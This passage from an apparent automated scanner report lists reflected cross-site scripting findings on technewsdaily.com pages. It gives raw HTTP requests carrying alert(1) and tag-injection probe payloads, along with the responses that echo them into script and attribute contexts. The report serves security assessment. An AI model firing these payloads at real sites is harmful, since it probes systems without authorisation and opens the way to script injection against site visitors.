1.53. http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /facebook-cartoon-profile-picture-trends-1757/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e230'-alert(1)-'30e4b928fec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /facebook-cartoon-profile-picture-trends-1757/?7e230'-alert(1)-'30e4b928fec=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68911

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
t type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/?7e230'-alert(1)-'30e4b928fec=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.54. http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /first-chrome-os-laptop-has-no-caps-lock-key-1769/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31d00'-alert(1)-'f12af6e76cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /first-chrome-os-laptop-has-no-caps-lock-key-176931d00'-alert(1)-'f12af6e76cc/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-176931d00'-alert(1)-'f12af6e76cc/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.55. http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /first-chrome-os-laptop-has-no-caps-lock-key-1769/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86294'-alert(1)-'8c545027418 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /first-chrome-os-laptop-has-no-caps-lock-key-1769/?86294'-alert(1)-'8c545027418=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62720

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
pe="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/?86294'-alert(1)-'8c545027418=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.56. http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /first-chrome-os-laptop-has-no-caps-lock-key-1769/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8bd8"><a>a9904dd5d15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /first-chrome-os-laptop-has-no-caps-lock-key-1769/?f8bd8"><a>a9904dd5d15=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63082

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/?f8bd8"><a>a9904dd5d15=1/" />
...[SNIP]...

1.57. http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /google-1-leaked-image-shows-social-networking-1767/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24ca1'-alert(1)-'bcfab85f83e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /google-1-leaked-image-shows-social-networking-176724ca1'-alert(1)-'bcfab85f83e/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
pe="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-176724ca1'-alert(1)-'bcfab85f83e/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.58. http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /google-1-leaked-image-shows-social-networking-1767/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc93c'-alert(1)-'586628d7054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /google-1-leaked-image-shows-social-networking-1767/?cc93c'-alert(1)-'586628d7054=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62043

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/?cc93c'-alert(1)-'586628d7054=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.59. http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /google-1-leaked-image-shows-social-networking-1767/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86b5f"><a>d8834390154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /google-1-leaked-image-shows-social-networking-1767/?86b5f"><a>d8834390154=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/?86b5f"><a>d8834390154=1/" />
...[SNIP]...

1.60. http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /google-launches-kids-teach-parents-tech-site-1809/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e009a'-alert(1)-'7ea9f31ecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /google-launches-kids-teach-parents-tech-site-1809e009a'-alert(1)-'7ea9f31ecf/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ype="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809e009a'-alert(1)-'7ea9f31ecf/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.61. http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /google-launches-kids-teach-parents-tech-site-1809/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ab8a'-alert(1)-'583da0e5858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /google-launches-kids-teach-parents-tech-site-1809/?5ab8a'-alert(1)-'583da0e5858=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
e="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/?5ab8a'-alert(1)-'583da0e5858=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.62. http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /google-launches-kids-teach-parents-tech-site-1809/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c729d"><a>28a95d03253 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /google-launches-kids-teach-parents-tech-site-1809/?c729d"><a>28a95d03253=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/?c729d"><a>28a95d03253=1/" />
...[SNIP]...

1.63. http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /hacker-strikes-florida-campus-1455/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0cc5'-alert(1)-'0afd2477a2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hacker-strikes-florida-campus-1455a0cc5'-alert(1)-'0afd2477a2e/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40466

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/hacker-strikes-florida-campus-1455a0cc5'-alert(1)-'0afd2477a2e/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.64. http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /hacker-strikes-florida-campus-1455/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 397e5"><a>3f4e5fd4418 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hacker-strikes-florida-campus-1455/?397e5"><a>3f4e5fd4418=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62801

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/?397e5"><a>3f4e5fd4418=1/" />
...[SNIP]...

1.65. http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /hacker-strikes-florida-campus-1455/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37e1a'-alert(1)-'03372dc3979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hacker-strikes-florida-campus-1455/?37e1a'-alert(1)-'03372dc3979=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
